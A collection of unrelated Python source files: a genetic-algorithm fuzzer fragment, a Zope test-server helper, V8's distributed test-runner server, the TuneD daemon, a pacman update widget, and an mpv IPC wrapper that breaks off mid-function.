return [choice(possible_genes) for _ in range(randint(1, len(possible_genes)))]
def add(self, new_genes):
genes_length = len(self.genes)
if genes_length >= 1:
pos = randint(0, genes_length - 1)
self.genes = self.genes[:pos:] + new_genes + self.genes[pos::]
else:
self.genes = new_genes
def delete(self):
genes_length = len(self.genes)
if genes_length >= 1:
start_pos = randint(0, genes_length - 1)
end_pos = randint(start_pos, genes_length - 1)
self.genes = self.genes[:start_pos] + self.genes[end_pos+1:]
else:
self.genes = []
def replace(self, new_genes):
genes_length = len(self.genes)
if genes_length >= 1:
start_pos = randint(0, genes_length - 1)
end_pos = randint(start_pos, genes_length - 1)
self.genes = self.genes[:start_pos:] + new_genes + self.genes[end_pos+1::]
def mutate(self, new_genes):
c = random()
if c < 0.25:
self.add(new_genes)
elif c < 0.5 and c >= 0.25:
self.delete()
elif c < 0.75 and c >= 0.5:
self.replace(new_genes)
return c < 0.75
# crossover
def exchage(self, other):
self.genes, other.genes = other.genes, self.genes
def pairwise_exchange(self, other):
length = min(len(self.genes), len(other.genes))
for i in range(0, length, 2):
self.genes[i], other.genes[i] = other.genes[i], self.genes[i]
def splice(self, other):
length = min(len(self.genes), len(other.genes))
mid = length // 2
parts = [self.genes[:mid:], self.genes[mid::], other.genes[:mid:], other.genes[mid::]]
shuffle(parts)
self.genes = parts[0] + parts[1]
other.genes = parts[2] + parts[3]
def crossover(self, other):
c = random()
if c < 0.25:
self.exchage(other)
elif c < 0.5 and c >= 0.25:
self.pairwise_exchange(other)
elif c < 0.75 and c >= 0.5:
self.splice(other)
return c < 0.75
pass_to_id = {p: i for i, p in enumerate(_RELAY_FUNCTION_HARD_PASSES_)}
evaluator = SimpleLSTMEvaluator(len(_RELAY_FUNCTION_HARD_PASSES_))
class Genotype:
def __init__(self, member_no):
self._generation = 0
self.member_no = member_no
self._fitness = -1
self._max_depth = 0
self.err = ""
self.out = ""
self.score = 0
self.genes_list = []
self.genes_length = 0
self._initial_member_no = -1
self.execute_time = -1
self.timeout = 600
self.cur_cov = 0
self.inc_cov = 0
self.exitcode = 0
def set_genes_list(self, genes_list):
self.genes_list = genes_list
self.genes_length = sum([len(i.genes) for i in genes_list])
def append_genes(self, genes, other_genes):
genes = Genes(genes, other_genes)
self.genes_list.append(genes)
self.genes_length += len(genes.genes)
def get_fitness(self):
return self.cur_cov
def mutate(self):
status = False
for genes in self.genes_list:
new_gene = genes.new()
status |= genes.mutate(new_gene)
return status
def crossover(self, other):
status = False
for genes1, genes2 in zip(self.genes_list, other.genes_list):
status |= genes1.crossover(genes2)
return status
def evaluate(self):
old_coverage = coverage.get_now()
coverage.push()
start_time = time()
try:
execute_both_mode(self.ctx)
except Exception as e:
self.err = e
self.cur_cov = coverage.get_now()
self.execute_time = time() - start_time
coverage.pop()
self.inc_cov = coverage.get_now() - old_coverage
# manager = Manager()
# return_dict = manager.dict()
# old_coverage = coverage.get_now()
# def run(ctx, return_dict):
# coverage.push()
# start_time = time()
# return_dict['err'] = ''
# try:
# execute_both_mode(ctx)
# except Exception as e:
# return_dict['err'] = e
# return_dict['cur_cov'] = coverage.get_now()
# return_dict['execute_time'] = time() - start_time
# coverage.pop()
# return_dict['cov'] = coverage.get_now()
# return_dict['hitmap'] = coverage.get_hitmap()
# p = Process(target=run, args=(self.ctx, return_dict))
# p.start()
# p.join(timeout=self.timeout)
# if p.is_alive():
# p.terminate()
# self.execute_time = self.timeout
# self.err = MaybeDeadLoop()
# else:
# self.exitcode = p.exitcode
# if p.exitcode > 0:
# if self.err == None:
# self.err = RuntimeFailure()
# if 'cur_cov' in return_dict:
# self.cur_cov = return_dict['cur_cov']
# if 'err' in return_dict:
# self.err = return_dict['err']
# if 'execute_time' in return_dict:
# self.execute_time = return_dict['execute_time']
# if 'cov' in return_dict:
# coverage.set_now(return_dict['cov'])
# if 'hitmap' in return_dict:
# coverage.set_hitmap(return_dict['hitmap'])
# self.inc_cov = coverage.get_now() - old_coverage
|
utils.py | import sys
import os.path
import random
import socket
import threading
from paste.deploy import loadapp
from paste.httpserver import serve
def get_interfaces(obj):
return [o for o in obj.__provides__.interfaces()]
# used on testing
# copied from ZopeLite Class from zope.testingZope.TestCase
# but we can't import it
# if we do we polluate our os.environment and ZopeTestcase usecase detction
def _print(msg):
'''Writes 'msg' to stderr and flushes the stream.'''
sys.stderr.write(msg)
sys.stderr.flush()
try:
import zope
from zope.traversing.adapters import DefaultTraversable
zope.component.provideAdapter(DefaultTraversable, [None])
class Request(zope.publisher.browser.TestRequest):
def __setitem__(self, name, value):
self._environ[name] = value
# alias
TestRequest = Request
def make_request(url='http://nohost/@@myview', form=None, *args, **kwargs):
r = Request(environ={'SERVER_URL': url,
'ACTUAL_URL': url},
form=form,
*args, **kwargs)
zope.interface.alsoProvides(
r, zope.annotation.interfaces.IAttributeAnnotatable)
return r
except Exception:
pass
def pstriplist(s):
print '\n'.join([a.rstrip() for a in s.split('\n') if a.strip()])
D = os.path.dirname
here_dir = D(D(D(D(D(D(os.path.abspath(__file__)))))))
def getApp():
wsgiapp = loadapp('config:etc/cgwb.ini', relative_to=here_dir)
return wsgiapp
def get_port():
for i in range(30):
port = random.randrange(20000, 30000)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
try:
s.connect(('localhost', port))
except socket.error:
return port
finally:
s.close()
raise RuntimeError("Can't find port")
class BFGServer:
def launch(self, app=None, host='0.0.0.0'):
"""
Some instance are registred there
- server: wsgi server
- host: wsgi server host
- port: wsgi server port
- app: the Pylon wsgi application
- t: the thread where the server is running in
"""
if not app:
app = getApp()
self.app = app
self.host = host
self.port = get_port()
self.server = serve(
self.app,
self.host, self.port,
socket_timeout=1,
start_loop=False,
)
def server_close(self):
"""
Finish pending requests and shutdown the server.
"""
self.running = False
self.socket.close()
self.thread_pool.shutdown(1)
def mainloop():
"""Handle requests."""
self.server.server_close = server_close
self.server.serve_forever()
self.t = threading.Thread(target=mainloop)
self.t.setDaemon(False)
self.t.start()
def get_url(self):
return 'http://%s:%s/' % (self.host, self.port)
def tearDown(self):
self.server.server_close(self.server)
self.t.join()
_LAUNCHED_SERVERS = []
def launch_server():
server = BFGServer()
server.launch()
_LAUNCHED_SERVERS.append(server)
return server, server.get_url()
|
main.py | # Copyright 2012 the V8 project authors. All rights reserved.
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import multiprocessing
import os
import shutil
import subprocess
import threading
import time
from . import daemon
from . import local_handler
from . import presence_handler
from . import signatures
from . import status_handler
from . import work_handler
from ..network import perfdata
class Server(daemon.Daemon):
def __init__(self, pidfile, root, stdin="/dev/null",
stdout="/dev/null", stderr="/dev/null"):
super(Server, self).__init__(pidfile, stdin, stdout, stderr)
self.root = root
self.local_handler = None
self.local_handler_thread = None
self.work_handler = None
self.work_handler_thread = None
self.status_handler = None
self.status_handler_thread = None
self.presence_daemon = None
self.presence_daemon_thread = None
self.peers = []
self.jobs = multiprocessing.cpu_count()
self.peer_list_lock = threading.Lock()
self.perf_data_lock = None
self.presence_daemon_lock = None
self.datadir = os.path.join(self.root, "data")
pubkey_fingerprint_filename = os.path.join(self.datadir, "mypubkey")
with open(pubkey_fingerprint_filename) as f:
self.pubkey_fingerprint = f.read().strip()
self.relative_perf_filename = os.path.join(self.datadir, "myperf")
if os.path.exists(self.relative_perf_filename):
with open(self.relative_perf_filename) as f:
try:
self.relative_perf = float(f.read())
except:
self.relative_perf = 1.0
else:
self.relative_perf = 1.0
def run(self):
os.nice(20)
self.ip = presence_handler.GetOwnIP()
self.perf_data_manager = perfdata.PerfDataManager(self.datadir)
self.perf_data_lock = threading.Lock()
self.local_handler = local_handler.LocalSocketServer(self)
self.local_handler_thread = threading.Thread(
target=self.local_handler.serve_forever)
self.local_handler_thread.start()
self.work_handler = work_handler.WorkSocketServer(self)
self.work_handler_thread = threading.Thread(
target=self.work_handler.serve_forever)
self.work_handler_thread.start()
self.status_handler = status_handler.StatusSocketServer(self)
self.status_handler_thread = threading.Thread(
target=self.status_handler.serve_forever)
self.status_handler_thread.start()
self.presence_daemon = presence_handler.PresenceDaemon(self)
self.presence_daemon_thread = threading.Thread(
target=self.presence_daemon.serve_forever)
self.presence_daemon_thread.start()
self.presence_daemon.FindPeers()
time.sleep(0.5) # Give those peers some time to reply.
with self.peer_list_lock:
for p in self.peers:
if p.address == self.ip: continue
status_handler.RequestTrustedPubkeys(p, self)
while True:
try:
self.PeriodicTasks()
time.sleep(60)
except Exception, e:
print("MAIN LOOP EXCEPTION: %s" % e)
self.Shutdown()
break
except KeyboardInterrupt:
self.Shutdown()
break
def Shutdown(self):
with open(self.relative_perf_filename, "w") as f:
f.write("%s" % self.relative_perf)
self.presence_daemon.shutdown()
self.presence_daemon.server_close()
self.local_handler.shutdown()
self.local_handler.server_close()
self.work_handler.shutdown()
self.work_handler.server_close()
self.status_handler.shutdown()
self.status_handler.server_close()
def PeriodicTasks(self):
# If we know peers we don't trust, see if someone else trusts them.
with self.peer_list_lock:
for p in self.peers:
if p.trusted: continue
if self.IsTrusted(p.pubkey):
p.trusted = True
status_handler.ITrustYouNow(p)
continue
for p2 in self.peers:
if not p2.trusted: continue
status_handler.TryTransitiveTrust(p2, p.pubkey, self)
# TODO: Ping for more peers waiting to be discovered.
# TODO: Update the checkout (if currently idle).
def AddPeer(self, peer):
with self.peer_list_lock:
for p in self.peers:
if p.address == peer.address:
return
self.peers.append(peer)
if peer.trusted:
status_handler.ITrustYouNow(peer)
def DeletePeer(self, peer_address):
with self.peer_list_lock:
for i in xrange(len(self.peers)):
if self.peers[i].address == peer_address:
del self.peers[i]
return
def MarkPeerAsTrusting(self, peer_address):
with self.peer_list_lock:
for p in self.peers:
if p.address == peer_address:
p.trusting_me = True
break
def UpdatePeerPerformance(self, peer_address, performance):
with self.peer_list_lock:
for p in self.peers:
if p.address == peer_address:
p.relative_performance = performance
def CopyToTrusted(self, pubkey_filename):
with open(pubkey_filename, "r") as f:
lines = f.readlines()
fingerprint = lines[-1].strip()
target_filename = self._PubkeyFilename(fingerprint)
shutil.copy(pubkey_filename, target_filename)
with self.peer_list_lock:
for peer in self.peers:
if peer.address == self.ip: continue
if peer.pubkey == fingerprint:
status_handler.ITrustYouNow(peer)
else:
result = self.SignTrusted(fingerprint)
status_handler.NotifyNewTrusted(peer, result)
return fingerprint
def _PubkeyFilename(self, pubkey_fingerprint):
return os.path.join(self.root, "trusted", "%s.pem" % pubkey_fingerprint)
def IsTrusted(self, pubkey_fingerprint):
return os.path.exists(self._PubkeyFilename(pubkey_fingerprint))
def ListTrusted(self):
path = os.path.join(self.root, "trusted")
if not os.path.exists(path): return []
return [ f[:-4] for f in os.listdir(path) if f.endswith(".pem") ]
def SignTrusted(self, pubkey_fingerprint):
if not self.IsTrusted(pubkey_fingerprint):
return []
filename = self._PubkeyFilename(pubkey_fingerprint)
result = signatures.ReadFileAndSignature(filename) # Format: [key, sig].
return [pubkey_fingerprint, result[0], result[1], self.pubkey_fingerprint]
def AcceptNewTrusted(self, data):
# The format of |data| matches the return value of |SignTrusted()|.
if not data: return
fingerprint = data[0]
pubkey = data[1]
signature = data[2]
signer = data[3]
if not self.IsTrusted(signer):
return
if self.IsTrusted(fingerprint):
return # Already trusted.
filename = self._PubkeyFilename(fingerprint)
signer_pubkeyfile = self._PubkeyFilename(signer)
if not signatures.VerifySignature(filename, pubkey, signature,
signer_pubkeyfile):
return
return # Nothing more to do.
def AddPerfData(self, test_key, duration, arch, mode):
data_store = self.perf_data_manager.GetStore(arch, mode)
data_store.RawUpdatePerfData(str(test_key), duration)
def CompareOwnPerf(self, test, arch, mode):
data_store = self.perf_data_manager.GetStore(arch, mode)
observed = data_store.FetchPerfData(test)
if not observed: return
own_perf_estimate = observed / test.duration
with self.perf_data_lock:
kLearnRateLimiter = 9999
self.relative_perf *= kLearnRateLimiter
self.relative_perf += own_perf_estimate
self.relative_perf /= (kLearnRateLimiter + 1)
|
daemon.py | import os
import errno
import threading
import tuned.logs
from tuned.exceptions import TunedException
from tuned.profiles.exceptions import InvalidProfileException
import tuned.consts as consts
from tuned.utils.commands import commands
from tuned import exports
from tuned.utils.profile_recommender import ProfileRecommender
import re
log = tuned.logs.get()
class Daemon(object):
def __init__(self, unit_manager, profile_loader, profile_names=None, config=None, application=None):
log.debug("initializing daemon")
self._daemon = consts.CFG_DEF_DAEMON
self._sleep_interval = int(consts.CFG_DEF_SLEEP_INTERVAL)
self._update_interval = int(consts.CFG_DEF_UPDATE_INTERVAL)
self._dynamic_tuning = consts.CFG_DEF_DYNAMIC_TUNING
self._recommend_command = True
if config is not None:
self._daemon = config.get_bool(consts.CFG_DAEMON, consts.CFG_DEF_DAEMON)
self._sleep_interval = int(config.get(consts.CFG_SLEEP_INTERVAL, consts.CFG_DEF_SLEEP_INTERVAL))
self._update_interval = int(config.get(consts.CFG_UPDATE_INTERVAL, consts.CFG_DEF_UPDATE_INTERVAL))
self._dynamic_tuning = config.get_bool(consts.CFG_DYNAMIC_TUNING, consts.CFG_DEF_DYNAMIC_TUNING)
self._recommend_command = config.get_bool(consts.CFG_RECOMMEND_COMMAND, consts.CFG_DEF_RECOMMEND_COMMAND)
self._application = application
if self._sleep_interval <= 0:
self._sleep_interval = int(consts.CFG_DEF_SLEEP_INTERVAL)
if self._update_interval == 0:
self._dynamic_tuning = False
elif self._update_interval < self._sleep_interval:
self._update_interval = self._sleep_interval
self._sleep_cycles = self._update_interval // self._sleep_interval
log.info("using sleep interval of %d second(s)" % self._sleep_interval)
if self._dynamic_tuning:
log.info("dynamic tuning is enabled (can be overridden by plugins)")
log.info("using update interval of %d second(s) (%d times of the sleep interval)" % (self._sleep_cycles * self._sleep_interval, self._sleep_cycles))
self._profile_recommender = ProfileRecommender(is_hardcoded = not self._recommend_command)
self._unit_manager = unit_manager
self._profile_loader = profile_loader
self._init_threads()
self._cmd = commands()
try:
self._init_profile(profile_names)
except TunedException as e:
log.error("Cannot set initial profile. No tunings will be enabled: %s" % e)
def _init_threads(self):
self._thread = None
self._terminate = threading.Event()
# Flag which is set if terminating due to profile_switch
self._terminate_profile_switch = threading.Event()
# Flag which is set if there is no operation in progress
self._not_used = threading.Event()
self._not_used.set()
self._profile_applied = threading.Event()
def reload_profile_config(self):
"""Read configuration files again and load profile according to them"""
self._init_profile(None)
def _init_profile(self, profile_names):
manual = True
post_loaded_profile = self._cmd.get_post_loaded_profile()
if profile_names is None:
(profile_names, manual) = self._get_startup_profile()
if profile_names is None:
msg = "No profile is preset, running in manual mode. "
if post_loaded_profile:
msg += "Only post-loaded profile will be enabled"
else:
msg += "No profile will be enabled."
log.info(msg)
# Passed through '-p' cmdline option
elif profile_names == "":
if post_loaded_profile:
log.info("Only post-loaded profile will be enabled")
else:
log.info("No profile will be enabled.")
self._profile = None
self._manual = None
self._active_profiles = []
self._post_loaded_profile = None
self.set_all_profiles(profile_names, manual, post_loaded_profile)
def _load_profiles(self, profile_names, manual):
profile_names = profile_names or ""
profile_list = profile_names.split()
if self._post_loaded_profile:
log.info("Using post-loaded profile '%s'"
% self._post_loaded_profile)
profile_list = profile_list + [self._post_loaded_profile]
for profile in profile_list:
if profile not in self.profile_loader.profile_locator.get_known_names():
errstr = "Requested profile '%s' doesn't exist." % profile
self._notify_profile_changed(profile_names, False, errstr)
raise TunedException(errstr)
try:
if profile_list:
self._profile = self._profile_loader.load(profile_list)
else:
self._profile = None
self._manual = manual
self._active_profiles = profile_names.split()
except InvalidProfileException as e:
errstr = "Cannot load profile(s) '%s': %s" % (" ".join(profile_list), e)
self._notify_profile_changed(profile_names, False, errstr)
raise TunedException(errstr)
def set_profile(self, profile_names, manual):
if self.is_running():
errstr = "Cannot set profile while the daemon is running."
self._notify_profile_changed(profile_names, False,
errstr)
raise TunedException(errstr)
self._load_profiles(profile_names, manual)
def _set_post_loaded_profile(self, profile_name):
if not profile_name:
self._post_loaded_profile = None
elif len(profile_name.split()) > 1:
errstr = "Whitespace is not allowed in profile names; only a single post-loaded profile is allowed."
raise TunedException(errstr)
else:
self._post_loaded_profile = profile_name
def set_all_profiles(self, active_profiles, manual, post_loaded_profile,
save_instantly=False):
if self.is_running():
errstr = "Cannot set profile while the daemon is running."
self._notify_profile_changed(active_profiles, False,
errstr)
raise TunedException(errstr)
self._set_post_loaded_profile(post_loaded_profile)
self._load_profiles(active_profiles, manual)
if save_instantly:
self._save_active_profile(active_profiles, manual)
self._save_post_loaded_profile(post_loaded_profile)
@property
def profile(self):
return self._profile
@property
def manual(self):
return self._manual
@property
def post_loaded_profile(self):
# Return the profile name only if the profile is active. If
# the profile is not active, then the value is meaningless.
return self._post_loaded_profile if self._profile else None
@property
def profile_recommender(self):
return self._profile_recommender
@property
def profile_loader(self):
return self._profile_loader
# send notification when profile is changed (everything is setup) or if error occured
# result: True - OK, False - error occured
def _notify_profile_changed(self, profile_names, result, errstr):
if self._application is not None and self._application._dbus_exporter is not None:
self._application._dbus_exporter.send_signal(consts.DBUS_SIGNAL_PROFILE_CHANGED, profile_names, result, errstr)
return errstr
def _full_rollback_required(self):
retcode, out = self._cmd.execute(["systemctl", "is-system-running"], no_errors = [0])
if retcode < 0:
return False
if out[:8] == "stopping":
return False
retcode, out = self._cmd.execute(["systemctl", "list-jobs"], no_errors = [0])
return re.search(r"\b(shutdown|reboot|halt|poweroff)\.target.*start", out) is None and not retcode
def _thread_code(self):
if self._profile is None:
raise TunedException("Cannot start the daemon without setting a profile.")
self._unit_manager.create(self._profile.units)
self._save_active_profile(" ".join(self._active_profiles),
self._manual)
self._save_post_loaded_profile(self._post_loaded_profile)
self._unit_manager.start_tuning()
self._profile_applied.set()
log.info("static tuning from profile '%s' applied" % self._profile.name)
if self._daemon:
exports.start()
profile_names = " ".join(self._active_profiles)
self._notify_profile_changed(profile_names, True, "OK")
if self._daemon:
# In python 2 interpreter with applied patch for rhbz#917709 we need to periodically
# poll, otherwise the python will not have chance to update events / locks (due to GIL)
# and e.g. DBus control will not work. The polling interval of 1 seconds (which is
# the default) is still much better than 50 ms polling with unpatched interpreter.
# For more details see TuneD rhbz#917587.
_sleep_cnt = self._sleep_cycles
while not self._cmd.wait(self._terminate, self._sleep_interval):
if self._dynamic_tuning:
_sleep_cnt -= 1
if _sleep_cnt <= 0:
_sleep_cnt = self._sleep_cycles
log.debug("updating monitors")
self._unit_manager.update_monitors()
log.debug("performing tunings")
self._unit_manager.update_tuning()
self._profile_applied.clear()
# wait for others to complete their tasks, use timeout 3 x sleep_interval to prevent
# deadlocks
i = 0
while not self._cmd.wait(self._not_used, self._sleep_interval) and i < 3:
i += 1
# if terminating due to profile switch
if self._terminate_profile_switch.is_set():
full_rollback = True
else:
# with systemd it detects system shutdown and in such case it doesn't perform
# full cleanup, if not shutting down it means that TuneD was explicitly
# stopped by user and in such case do full cleanup, without systemd never
# do full cleanup
full_rollback = False
if self._full_rollback_required():
if self._daemon:
log.info("terminating TuneD, rolling back all changes")
full_rollback = True
else:
log.info("terminating TuneD in one-shot mode")
else:
log.info("terminating TuneD due to system shutdown / reboot")
if self._daemon:
self._unit_manager.stop_tuning(full_rollback)
self._unit_manager.destroy_all()
def _save_active_profile(self, profile_names, manual):
try:
self._cmd.save_active_profile(profile_names, manual)
except TunedException as e:
log.error(str(e))
def _save_post_loaded_profile(self, profile_name):
try:
self._cmd.save_post_loaded_profile(profile_name)
except TunedException as e:
log.error(str(e))
def _get_recommended_profile(self):
log.info("Running in automatic mode, checking what profile is recommended for your configuration.")
profile = self._profile_recommender.recommend()
log.info("Using '%s' profile" % profile)
return profile
def _get_startup_profile(self):
profile, manual = self._cmd.get_active_profile()
if manual is None:
manual = profile is not None
if not manual:
profile = self._get_recommended_profile()
return profile, manual
def get_all_plugins(self):
"""Return all accessible plugin classes"""
return self._unit_manager.plugins_repository.load_all_plugins()
def get_plugin_documentation(self, plugin_name):
"""Return plugin class docstring"""
try:
plugin_class = self._unit_manager.plugins_repository.load_plugin(
plugin_name
)
except ImportError:
return ""
return plugin_class.__doc__
def get_plugin_hints(self, plugin_name):
"""Return plugin's parameters and their hints
Parameters:
plugin_name -- plugins name
Return:
dictionary -- {parameter_name: hint}
"""
try:
plugin_class = self._unit_manager.plugins_repository.load_plugin(
plugin_name
)
except ImportError:
return {}
return plugin_class.get_config_options_hints()
def is_enabled(self):
return self._profile is not None
def is_running(self):
return self._thread is not None and self._thread.is_alive()
def start(self):
if self.is_running():
return False
if self._profile is None:
return False
log.info("starting tuning")
self._not_used.set()
self._thread = threading.Thread(target=self._thread_code)
self._terminate_profile_switch.clear()
self._terminate.clear()
self._thread.start()
return True
def verify_profile(self, ignore_missing):
if not self.is_running():
log.error("TuneD is not running")
return False
if self._profile is None:
log.error("no profile is set")
return False
if not self._profile_applied.is_set():
log.error("profile is not applied")
return False
# using deamon, the main loop mustn't exit before our completion
self._not_used.clear()
log.info("verifying profile(s): %s" % self._profile.name)
ret = self._unit_manager.verify_tuning(ignore_missing)
# main loop is allowed to exit
self._not_used.set()
return ret
# profile_switch is helper telling plugins whether the stop is due to profile switch
def stop(self, profile_switch = False):
if not self.is_running():
return False
log.info("stopping tuning")
if profile_switch:
self._terminate_profile_switch.set()
self._terminate.set()
self._thread.join()
self._thread = None
return True
|
pacman.py | # pylint: disable=C0111,R0903
"""Displays update information per repository for pacman."
Requires the following executables:
* fakeroot
* pacman
"""
import os
import threading
import bumblebee.input
import bumblebee.output
import bumblebee.engine
#list of repositories.
#the last one sould always be other
repos = ["core", "extra", "community", "multilib", "testing", "other"]
def get_pacman_info(widget, path):
try:
result = bumblebee.util.execute("{}/../../bin/pacman-updates".format(path))
except:
pass
count = len(repos)*[0]
for line in result.splitlines():
if line.startswith(("http", "rsync")):
for i in range(len(repos)-1):
if "/" + repos[i] + "/" in line:
count[i] += 1
break
else:
result[-1] += 1
for i in range(len(repos)):
widget.set(repos[i], count[i])
class Module(bumblebee.engine.Module):
def __init__(self, engine, config):
super(Module, self).__init__(engine, config,
bumblebee.output.Widget(full_text=self.updates)
)
self._count = 0
def updates(self, widget):
return '/'.join(map(lambda x: str(widget.get(x,0)), repos))
def update(self, widgets):
path = os.path.dirname(os.path.abspath(__file__))
if self._count == 0:
thread = threading.Thread(target=get_pacman_info, args=(widgets[0],path))
thread.start()
# TODO: improve this waiting mechanism a bit
self._count += 1
self._count = 0 if self._count > 300 else self._count
def state(self, widget):
weightedCount = sum(map(lambda x: (len(repos)-x[0]) * widget.get(x[1],0), enumerate(repos)))
if weightedCount < 10:
return "good"
return self.threshold_state(weightedCount, 100, 150)
# vim: tabstop=8 expandtab shiftwidth=4 softtabstop=4
|
mpv.py | # coding: utf-8
# ------------------------------------------------------------------------------
#
# mpv.py - Control mpv from Python using JSON IPC
#
# Copyright (c) 2015 Lars Gustäbel <lars@gustaebel.de>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
#
# ------------------------------------------------------------------------------
import sys
import os
import time
import json
import socket
import select
import tempfile
import threading
import subprocess
import inspect
from distutils.spawn import find_executable
from queue import Queue, Empty, Full
class MPVError(Exception):
pass
class MPVProcessError(MPVError):
pass
class MPVCommunicationError(MPVError):
pass
class MPVCommandError(MPVError):
pass
class MPVTimeoutError(MPVError):
pass
from anki.utils import isWin
if isWin:
import win32file, win32pipe, pywintypes, winerror
class MPVBase:
"""Base class for communication with the mpv media player via unix socket
based JSON IPC.
"""
executable = find_executable("mpv")
popenEnv = None
default_argv = [
"--idle",
"--no-terminal",
"--force-window=no",
"--ontop",
"--audio-display=no",
"--input-media-keys=no",
]
def __init__(self, window_id=None, debug=False):
self.window_id = window_id
self.debug = debug
self._prepare_socket()
self._prepare_process()
self._start_process()
self._start_socket()
self._prepare_thread()
self._start_thread()
def __del__(self):
self._stop_thread()
self._stop_process()
self._stop_socket()
def _thread_id(self):
return threading.get_ident()
#
# Process
#
def _prepare_process(self):
"""Prepare the argument list for the mpv process.
"""
self.argv = [self.executable]
self.argv += self.default_argv
self.argv += ["--input-ipc-server", self._sock_filename]
if self.window_id is not None:
self.argv += ["--wid", str(self.window_id)]
def _start_process(self):
"""Start the mpv process.
"""
self._proc = subprocess.Popen(self.argv, env=self.popenEnv)
def _stop_process(self):
"""Stop the mpv process.
"""
if hasattr(self, "_proc"):
try:
self._proc.terminate()
self._proc.wait()
except ProcessLookupError:
pass
#
# Socket communication
#
def _prepare_socket(self):
"""Create a random socket filename which we pass to mpv with the
--input-unix-socket option.
"""
if isWin:
self._sock_filename = "ankimpv"
return
fd, self._sock_filename = tempfile.mkstemp(prefix="mpv.")
os.close(fd)
os.remove(self._sock_filename)
def _start_socket(self):
"""Wait for the mpv process to create the unix socket and finish
startup.
"""
start = time.time()
while self.is_running() and time.time() < start+10:
time.sleep(0.1)
if isWin:
# named pipe
try:
self._sock = win32file.CreateFile(r'\\.\pipe\ankimpv',
win32file.GENERIC_READ | win32file.GENERIC_WRITE,
0, None, win32file.OPEN_EXISTING, 0, None)
win32pipe.SetNamedPipeHandleState(self._sock,
1, # PIPE_NOWAIT
None, None)
except pywintypes.error as err:
if err.args[0] == winerror.ERROR_FILE_NOT_FOUND:
pass
else:
break
else:
break
else:
# unix socket
try:
self._sock = socket.socket(socket.AF_UNIX)
self._sock.connect(self._sock_filename)
except (FileNotFoundError, ConnectionRefusedError):
self._sock.close()
continue
else:
break
else:
raise MPVProcessError("unable to start process")
def _stop_socket(self):
"""Clean up the socket.
"""
if hasattr(self, "_sock"):
self._sock.close()
if hasattr(self, "_sock_filename"):
try:
os.remove(self._sock_filename)
except OSError:
pass
def _prepare_thread(self):
"""Set up the queues for the communication threads.
"""
self._request_queue = Queue(1)
self._response_queues = {}
self._event_queue = Queue()
self._stop_event = threading.Event()
def _start_thread(self):
"""Start up the communication threads.
"""
self._thread = threading.Thread(target=self._reader)
self._thread.start()
def _stop_thread(self):
"""Stop the communication threads.
"""
if hasattr(self, "_stop_event"):
self._stop_event.set()
if hasattr(self, "_thread"):
self._thread.join()
def _reader(self):
"""Read the incoming json messages from the unix socket that is
connected to the mpv process. Pass them on to the message handler.
"""
buf = b""
while not self._stop_event.is_set():
if isWin:
try:
(n, b) = win32file.ReadFile(self._sock, 4096)
buf += b
except pywintypes.error as err:
if err.args[0] == winerror.ERROR_NO_DATA:
time.sleep(0.1)
continue
elif err.args[0] == winerror.ERROR_BROKEN_PIPE:
return
else:
raise
else:
r, w, e = select.select([self._sock], [], [], 1)
if r:
b = self._sock.recv(1024)
if not b:
break
buf += b
newline = buf.find(b"\n")
while newline >= 0:
data = buf[:newline + 1]
buf = buf[newline + 1:]
if self.debug:
sys.stdout.write("<<< " + data.decode("utf8", "replace"))
message = self._parse_message(data)
self._handle_message(message)
newline = buf.find(b"\n")
#
# Message handling
#
def _compose_message(self, message):
"""Return a json representation from a message dictionary.
"""
# XXX may be strict is too strict ;-)
data = json.dumps(message, separators=",:")
return data.encode("utf8", "strict") + b"\n"
def _parse_message(self, data):
"""Return a message dictionary from a json representation.
"""
# XXX may be strict is too strict ;-)
data = data.decode("utf8", "strict")
return json.loads(data)
def _handle_message(self, message):
"""Handle different types of incoming messages, i.e. responses to
commands or asynchronous events.
"""
if "error" in message:
# This message is a reply to a request.
try:
thread_id = self._request_queue.get(timeout=1)
except Empty:
raise MPVCommunicationError("got a response without a pending request")
self._response_queues[thread_id].put(message)
elif "event" in message:
# This message is an asynchronous event.
self._event_queue.put(message)
else:
